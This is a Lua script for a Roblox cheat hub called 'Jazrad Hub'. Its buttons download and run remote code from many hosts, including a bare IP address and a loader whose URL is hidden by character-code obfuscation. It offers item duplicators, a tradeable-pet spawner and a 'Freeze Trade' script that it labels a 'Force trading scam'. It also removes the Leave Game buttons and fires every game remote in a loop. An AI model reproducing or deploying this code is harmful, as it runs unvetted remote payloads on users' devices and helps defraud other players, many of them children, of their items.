-------------------------------------------------------
-- SERVICES / PLAYER
-------------------------------------------------------
local Players = game:GetService("Players")
local TeleportService = game:GetService("TeleportService")
local HttpService = game:GetService("HttpService")
local VirtualUser = game:GetService("VirtualUser")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local CoreGui = game:GetService("CoreGui")

local localPlayer = Players.LocalPlayer

-------------------------------------------------------
-- LOAD WINDUI
-------------------------------------------------------
local WindUI = loadstring(game:HttpGet(
    "https://raw.githubusercontent.com/Footagesus/WindUI/main/dist/main.lua"
))()

-------------------------------------------------------
-- CREATE WINDOW
-------------------------------------------------------
local Window = WindUI:CreateWindow({
    Title = "Library | Jazrad Hub",
    Icon = "laptop",
    Author = "made by Jazrad",
    Folder = "JazradHubLibrary",
    Size = UDim2.fromOffset(520, 420),
    Transparent = true,
    Theme = "Dark",

    User = {
        Enabled = true,
        Callback = function() end,
        Anonymous = false
    },

    SideBarWidth = 150,
    ScrollBarEnabled = true
})

Window:Tag({
    Title = "v1.7.0",
    Icon = "github",
    Color = Color3.fromHex("#00BFFF"),
    Radius = 13,
})

-------------------------------------------------------
-- REMOVE LEAVE GAME BUTTONS
-------------------------------------------------------
task.spawn(function()
    local function removeLeave(btn)
        if btn and (btn.Name == "LeaveGameButton" or btn.Name == "DontLeaveGameButton") then
            pcall(function() btn:Destroy() end)
        end
    end

    for _, v in ipairs(CoreGui:GetDescendants()) do
        removeLeave(v)
    end

    CoreGui.DescendantAdded:Connect(removeLeave)
end)

-------------------------------------------------------
-- TABS
-------------------------------------------------------
local DashboardTab = Window:Tab({ Title = "🎮 Dashboard" })
local OtherTab = Window:Tab({ Title = "👁 Other Games" })
local MM2Tab   = Window:Tab({ Title = "🔪 MM2" })
local ADMTab   = Window:Tab({ Title = "❤️ AdoptMe" })
local MiscTab  = Window:Tab({ Title = "⚙️ Misc" })
local AboutTab = Window:Tab({ Title = "ℹ️ About" })

-------------------------------------------------------
-- GAMING DASHBOARD TAB
-------------------------------------------------------
local startTime = tick()
local scriptsLoadedCount = 0

local function getPlayTime()
    local elapsed = tick() - startTime
    local hours = math.floor(elapsed / 3600)
    local minutes = math.floor((elapsed % 3600) / 60)
    local seconds = math.floor(elapsed % 60)
    return string.format("%02d:%02d:%02d", hours, minutes, seconds)
end

local function getServerRegion()
    local success, ping = pcall(function()
        return game:GetService("Stats").Network.ServerStatsItem["Data Ping"]:GetValue()
    end)
    
    if not success then return "🟡 Unknown" end
    
    if ping < 50 then return "🟢 Excellent"
    elseif ping < 100 then return "🟡 Good"
    elseif ping < 150 then return "🟠 Fair"
    else return "🔴 Poor" end
end

DashboardTab:Paragraph({
    Title = "🎮 Gaming Dashboard",
    Desc = "Real-time stats and quick access controls",
    Image = "activity",
    Color = "Blue"
})

DashboardTab:Section({ Title = "📊 Session Stats" })

local serverInfoParagraph = DashboardTab:Paragraph({
    Title = "Server Information",
    Desc = "Server ID: " .. game.JobId:sub(1, 16) .. "...\n" ..
           "Players: " .. #Players:GetPlayers() .. "/" .. Players.MaxPlayers .. "\n" ..
           "Place ID: " .. game.PlaceId .. "\n" ..
           "Connection: " .. getServerRegion(),
    Color = "Green"
})

local sessionParagraph = DashboardTab:Paragraph({
    Title = "Your Session",
    Desc = "Play Time: " .. getPlayTime() .. "\n" ..
           "Scripts Loaded: " .. scriptsLoadedCount .. "\n" ..
           "Hub Version: v1.7.0\n" ..
           "Status: Active ✅",
    Color = "Blue"
})

-- Update stats every second
task.spawn(function()
    while task.wait(1) do
        pcall(function()
            sessionParagraph:Update({
                Desc = "Play Time: " .. getPlayTime() .. "\n" ..
                       "Scripts Loaded: " .. scriptsLoadedCount .. "\n" ..
                       "Hub Version: v1.7.0\n" ..
                       "Status: Active ✅"
            })
            
            serverInfoParagraph:Update({
                Desc = "Server ID: " .. game.JobId:sub(1, 16) .. "...\n" ..
                       "Players: " .. #Players:GetPlayers() .. "/" .. Players.MaxPlayers .. "\n" ..
                       "Place ID: " .. game.PlaceId .. "\n" ..
                       "Connection: " .. getServerRegion()
            })
        end)
    end
end)

DashboardTab:Section({ Title = "🎯 Popular Scripts" })

DashboardTab:Button({
    Title = "House ClonerV2",
    Desc = "Clone house builds V2 • ✅ Working",
    Icon = "home",
    Callback = function()
        scriptsLoadedCount = scriptsLoadedCount + 1
        loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/house%20V2222"))()
    end
})

DashboardTab:Button({
    Title = "Minigames Autofarm",
    Desc = "Auto complete minigames • ✅ Working",
    Icon = "gamepad-2",
    Callback = function()
        scriptsLoadedCount = scriptsLoadedCount + 1
        loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/gingigigi"))()
    end
})

DashboardTab:Button({
    Title = "GingerBread Farm",
    Desc = "Farm gingerbread cookies • ✅ Working",
    Icon = "cookie",
    Callback = function()
        scriptsLoadedCount = scriptsLoadedCount + 1
        loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/asczxcee"))()
    end
})

-------------------------------------------------------
-- FULL SCRIPT LIST
-------------------------------------------------------
local Scripts = {
    ["DarkScript Spawner"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/veryimportantrr/x/refs/heads/main/gag_visual.lua"))()', section="Other", desc="Visual spawner for various games", status="✅ Working" },
    ["Ronix Hub"] = { script='loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/b44706178039e9b88c4d768d4d8b012f.lua"))()', section="Other", desc="Multi-game hub with various features", status="✅ Working" },
    ["Lunor"] = { script='loadstring(game:HttpGet("https://lunor.dev/loader"))()', section="Other", desc="Premium universal hub", status="✅ Working" },
    ["Thunder Z Hub"] = { script="loadstring(game:HttpGet('https://raw.githubusercontent.com/ThundarZ/Welcome/refs/heads/main/Main/GaG/Main.lua'))()", section="Other", desc="Thunder Z universal script hub", status="✅ Working" },
    ["Quantum Hub (Keyless)"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/flazhy/QuantumOnyx/refs/heads/main/QuantumOnyx.lua"))()', section="Other", desc="Keyless quantum hub", status="✅ Working" },
    ["Limit Hub"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/FakeModz/LimitHub/refs/heads/main/LimitHub_Luarmor_E.lua"))()', section="Other", desc="Limit hub with multiple game support", status="✅ Working" },
    ["Speed Hub"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/AhmadV99/Speed-Hub-X/main/Speed%20Hub%20X.lua",true))()', section="Other", desc="Fast-loading universal hub", status="✅ Working" },
    ["All-in-one Script"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Jaradscript/refs/heads/main/jarapd%20script"))()', section="Other", desc="Collection of useful scripts", status="✅ Working" },
    ["ZysumeHub"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/ZusumeHub/ZusumeHub/refs/heads/main/UpdateZysume"))()', section="Other", desc="Zysume multi-purpose hub", status="✅ Working" },
    ["Than Hub"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/thantzy/thanhub/refs/heads/main/thanv1"))()', section="Other", desc="Than hub utilities", status="✅ Working" },
    ["Dupe Remover"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/DupeRemover"))()', section="Other", desc="Remove duplicate pets/items", status="✅ Working" },
    ["Pet Kg Changer"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/PetWeightchanger"))()', section="Other", desc="Change pet weight values", status="✅ Working" },
    ["Freeze Trade"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/Trade%20freeze"))()', section="Other", desc="Freeze trading screen", status="✅ Working" },
    ["Mooncat Bugger"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/Mooncat"))()', section="Other", desc="Mooncat exploit tool", status="✅ Working" },
    ["PVB DUPER"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/pvb%20chrg"))()', section="Other", desc="PVB duplication script", status="⚠️ Use Caution" },
    
    ["Brookhaven"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/Front-Evill/Script-Hub/refs/heads/main/GUI/gui.brookhavan.lua"))()', section="Other", desc="Brookhaven RP script hub", status="✅ Working" },
    ["The Forge [XMAS]"] = { script='loadstring(game:HttpGet("https://getastra.lol/loader.lua"))()', section="Other", desc="The Forge Christmas edition", status="🔑 KEY SYSTEM" },
    ["Death Ball"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/Urbanstormm/Project-Stark/main/Main.lua"))()', section="Other", desc="Death Ball game script", status="🔑 KEY SYSTEM" },
    ["Dandy's World [ALPHA]"] = { script=[[local __ = {
    ['\242'] = function(x) return loadstring(game:HttpGet(x))() end,
    ['\173'] = function(q)
        local o, l = {}, 1
        for i in q:gmatch('%d+') do
            o[l], l = string.char(i + 0), l + 1
        end
        return table.concat(o)
    end,
    ['\192'] = '104 116 116 112 115 58 47 47 114 97 119 46 103 105 116 104 117 98 117 115 101 114 99 111 110 116 101 110 116 46 99 111 109 47 85 114 98 97 110 115 116 111 114 109 109 47 80 114 111 106 101 99 116 45 83 116 97 114 107 47 109 97 105 110 47 77 97 105 110 46 108 117 97',
    ['\111'] = function(...)
        local a = {...}
        return a[1](a[2](a[3]))
    end,
    ['\255'] = '\242\173\192'
}

(function(a)
    local s, m, d = a['\255']:byte(1), a['\255']:byte(2), a['\255']:byte(3)
    local f1, f2, f3 = a[string.char(s)], a[string.char(m)], a[string.char(d)]
    return a['\111'](f1, f2, f3)
end)(__)]], section="Other", desc="Dandy's World alpha script", status="✅ Working" },
    ["RIVALS"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/axleoislost/Accent/main/Rivals"))()', section="Other", desc="Rivals script", status="🔑 KEY SYSTEM" },
    ["99 Nights in the Forest"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/Nicuse101/RobloxUtils/refs/heads/master/99NITF.lua"))()', section="Other", desc="Hub script", status="🔑 KEY SYSTEM" },
    ["Arsenal"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/CriShoux/OwlHub/master/OwlHub.txt"))()', section="Other", desc="Owl Hub", status="✅ Working" },
    ["DOORS [NEW BUNDLE]"] = { script='loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/ae83a9f6cf2eed1ea6bf09ff11659945.lua"))()', section="Other", desc="DOORS script", status="🔑 KEY SYSTEM" },
    ["Scary Shawarma Kiosk"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/hassanxzayn-lua/NEOXHUBMAIN/refs/heads/main/loader", true))()', section="Other", desc="Horror anomaly script", status="🔑 KEY SYSTEM" },
    ["Blox Fruits"] = { script='loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/d5ed1fbd4301b1d18d75153c5b47181d.lua"))()', section="Other", desc="Blox Fruits hub", status="🔑 KEY SYSTEM" },
    ["Fisch [SANTA]"] = { script='loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/fda9babd071d6b536a745774b6bc681c.lua"))()', section="Other", desc="Fisch script", status="🔑 KEY SYSTEM" },

    ["BeeconHub"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/BaconBossScript/BeeconHub/main/BeeconHub"))()', section="MM2", desc="MM2 hub with ESP, Auto, etc", status="✅ Working" },
    ["Inf Snowflakes"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/inffinfnff"))()', section="MM2", desc="Infinite snowflakes farm", status="✅ Working" },
    ["Radeon Hub"] = { script='loadstring(game:HttpGet("https://pastebin.com/raw/v1LKQGxN",true))()', section="MM2", desc="Radeon MM2 Paid features", status="✅ Working" },
    ["Echelon"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/echelonvanta/Scripts/refs/heads/main/Loader"))()', section="MM2", desc="Echelon MM2 Paid script", status="✅ Working" },

    ["Minigames Autofarm"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/gingigigi"))()', section="ADM", desc="Auto complete minigames", status="✅ Working" },
    ["GingerBread Farm"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/asczxcee"))()', section="ADM", desc="Farm gingerbread cookies", status="✅ Working" },
    ["House ClonerV2"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/house%20V2222"))()', section="ADM", desc="Clone house builds V2", status="✅ Working" },
    ["Instant Hatch | Instant Mega Neon"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/ADOPT%20ME"))()', section="ADM", desc="Instant egg hatch and mega neon making", status="✅ Working" },
    ["AutoFarm GingerBread"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/ginger%20bread"))()', section="ADM", desc="Alternative gingerbread farm", status="✅ Working" },
    ["Pet Spawner (Tradeable)"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/asdawdads"))()', section="ADM", desc="Spawn tradeable pets", status="⚠️ Use Caution" },
    ["AdoptMe FreezeTrade"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/Trade%20freeze"))()', section="ADM", desc="Force trading scam", status="✅ Working" },
    ["House Cloner"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/copyhouse"))()', section="ADM", desc="Clone house builds", status="✅ Working" },
    ["ProdigyX"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/proidyg"))()', section="ADM", desc="ProdigyX AdoptMe features", status="✅ Working" },
    ["AdoptMe JazradHub"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/ADOPT%20ME"))()', section="ADM", desc="Complete AdoptMe hub", status="✅ Working" },
    ["MM2 & ADM AutoFarm"] = { script='loadstring(game:HttpGet("http://109.71.240.235:3910/cdn/visual.luau"))()', section="ADM", desc="Adopt Me & MM2 Autofarm", status="✅ Working" },
}

local function AddScripts(tab, section)
    for name, data in pairs(Scripts) do
        if data.section == section then
            tab:Button({
                Title = name,
                Desc = (data.desc or "No description") .. " • " .. (data.status or "Unknown"),
                Icon = "play",
                Callback = function()
                    scriptsLoadedCount = scriptsLoadedCount + 1
                    loadstring(data.script)()
                end
            })
        end
    end
end

-- Other Games Tab
OtherTab:Paragraph({
    Title = "Universal & Tools",
    Desc = "Universal hubs and utility scripts",
    Image = "package"
})

OtherTab:Section({ Title = "🔓 No Key Required" })
for name, data in pairs(Scripts) do
    if data.section == "Other" and data.status ~= "🔑 KEY SYSTEM" then
        OtherTab:Button({
            Title = name,
            Desc = (data.desc or "No description") .. " • " .. (data.status or "Unknown"),
            Icon = "play",
            Callback = function()
                scriptsLoadedCount = scriptsLoadedCount + 1
                loadstring(data.script)()
            end
        })
    end
end

OtherTab:Section({ Title = "🔑 Key System Required" })
for name, data in pairs(Scripts) do
    if data.section == "Other" and data.status == "🔑 KEY SYSTEM" then
        OtherTab:Button({
            Title = name,
            Desc = (data.desc or "No description") .. " • " .. (data.status or "Unknown"),
            Icon = "key",
            Callback = function()
                scriptsLoadedCount = scriptsLoadedCount + 1
                loadstring(data.script)()
            end
        })
    end
end

-- MM2 Tab
MM2Tab:Paragraph({
    Title = "Murder Mystery 2",
    Desc = "Complete MM2 script collection",
    Image = "crosshair"
})

AddScripts(MM2Tab,"MM2")

-- AdoptMe Tab
ADMTab:Paragraph({
    Title = "Adopt Me Scripts",
    Desc = "AutoFarms, trading, building, and more",
    Image = "heart"
})

for name, data in pairs(Scripts) do
    if data.section == "ADM" then
        ADMTab:Button({
            Title = name,
            Desc = (data.desc or "No description") .. " • " .. (data.status or "Unknown"),
            Icon = "play",
            Callback = function()
                scriptsLoadedCount = scriptsLoadedCount + 1
                loadstring(data.script)()
            end
        })
    end
end

-------------------------------------------------------
-- ABOUT TAB
-------------------------------------------------------
AboutTab:Paragraph({
    Title = "About Jazrad Hub",
    Desc =
        "Universal script hub for multiple popular Roblox games.\n" ..
        "Optimized for both Mobile (Android/iOS) and PC with a modern WindUI design.",
    Image = "info"
})

AboutTab:Paragraph({
    Title = "✨ Features",
    Desc =
        "• Supports a wide variety of games\n" ..
        "• Simple and well-structured menu\n" ..
        "• Fast script loading with one click\n" ..
        "• Optimized for mobile and touch devices\n" ..
        "• Clean and modern WindUI design\n" ..
        "• Automatically loads compatible scripts\n" ..
        "• Smooth minimize and expand option\n" ..
        "• NEW: Live Gaming Dashboard with stats",
    Image = "star"
})

AboutTab:Paragraph({
    Title = "📝 How to Use",
    Desc =
        "1. Choose your desired game\n" ..
        "2. Click the load button\n" ..
        "3. Enjoy the features!",
    Image = "edit"
})

-------------------------------------------------------
-- MISC TAB
-------------------------------------------------------
MiscTab:Paragraph({
    Title = "Miscellaneous Features",
    Desc = "Various helpful utilities",
    Image = "settings",
    Color = "Blue"
})

MiscTab:Dropdown({
    Title = "Theme Switcher",
    Values = {"Dark","Light","Rose"},
    Default = "Dark",
    Callback = function(theme)
        WindUI:SetTheme(theme)
    end
})

MiscTab:Button({
    Title = "Anti AFK",
    Icon = "clock",
    Callback = function()
        localPlayer.Idled:Connect(function()
            VirtualUser:Button2Down(Vector2.new(0,0), workspace.CurrentCamera.CFrame)
            task.wait(1)
            VirtualUser:Button2Up(Vector2.new(0,0), workspace.CurrentCamera.CFrame)
        end)
    end
})

MiscTab:Toggle({
    Title = "Auto Snowball Pug",
    Default = false,
    Callback = function(v)
        getgenv().AutoSnowballPug = v
        if v then
            task.spawn(function()
                while getgenv().AutoSnowballPug do
                    task.wait(0.15)
                    pcall(function()
                        local api = ReplicatedStorage:FindFirstChild("API")
                        if api then
                            for _, r in pairs(api:GetChildren()) do
                                if r:IsA("RemoteEvent") then r:FireServer()
                                elseif r:IsA("RemoteFunction") then r:InvokeServer(true) end
                            end
                        end
                    end)
                end
            end)
        end
    end
})

MiscTab:Button({
    Title = "Rejoin Server",
    Icon = "refresh-cw",
    Callback = function()
        TeleportService:TeleportToPlaceInstance(game.PlaceId, game.JobId, localPlayer)
    end
})

MiscTab:Button({
    Title = "Server Hop",
    Icon = "shuffle",
    Callback = function()
        local servers = HttpService:JSONDecode(
            game:HttpGet("https://games.roblox.com/v1/games/"..game.PlaceId.."/servers/Public?limit=100")
        )
        for _, s in pairs(servers.data) do
            if s.playing < s.maxPlayers and s.id ~= game.JobId then
                TeleportService:TeleportToPlaceInstance(game.PlaceId, s.id, localPlayer)
                break
            end
        end
    end
})

MiscTab:Paragraph({
    Title = "Player Info",
    Desc = "Display Name: "..localPlayer.DisplayName..
           "\nUsername: @"..localPlayer.Name..
           "\nUser ID: "..localPlayer.UserId,
    Color = "Green"
})

-------------------------------------------------------
-- INFO TAB
-------------------------------------------------------
local InfoTab = Window:Tab({
    Title = "❗ Info"
})

InfoTab:Paragraph({
    Title = "Jazrad Hub",
    Desc =
        "Version: v1.7.0\n" ..
        "Status: Stable\n" ..
        "UI Library: WindUI\n" ..
        "Last Update: " .. os.date("%B %d, %Y"),
    Image = "info",
    Color = "Blue"
})

InfoTab:Paragraph({
    Title = "Credits",
    Desc =
        "Developer: Jazrad\n" ..
        "Scripting: Jazrad\n" ..
        "UI: WindUI",
    Image = "star",
    Color = "Green"
})

InfoTab:Button({
    Title = "Copy Hub Name",
    Icon = "clipboard",
    Callback = function()
        setclipboard("Jazrad Hub")
    end
})

-------------------------------------------------------
-- SOCIALS TAB
-------------------------------------------------------
local SocialsTab = Window:Tab({
    Title = "🌐 Community"
})

SocialsTab:Paragraph({
    Title = "Community & Support",
    Desc = "Stay connected with Jazrad Hub",
    Image = "users"
})

SocialsTab:Button({
    Title = "Copy Discord Invite",
    Icon = "message-circle",
    Callback = function()
        setclipboard("https://discord.gg/jaHnQN2z9j")
    end
})

SocialsTab:Button({
    Title = "More Scripts",
    Icon = "code",
    Callback = function()
        setclipboard("https://github.com/YourUsername")
    end
})

SocialsTab:Button({
    Title = "YouTube Channel",
    Icon = "youtube",
    Callback = function()
        setclipboard("https://youtube.com/@WhosJaraddd")
    end
})

SocialsTab:Button({
    Title = "TikTok Profile",
    Icon = "music",
    Callback = function()
        setclipboard("https://tiktok.com/@ikikukkk")
    end
})

SocialsTab:Paragraph({
    Title = "Credits",
    Desc = "Developer: Jazrad\nUI: WindUI",
    Image = "star"
})

-------------------------------------------------------
-- LOADED NOTIFICATION
-------------------------------------------------------
WindUI:Notify({
    Title = "Jazrad Hub Loaded",
    Content = "v1.7.0 - Everything loaded successfully",
    Icon = "check",
    Duration = 3
})
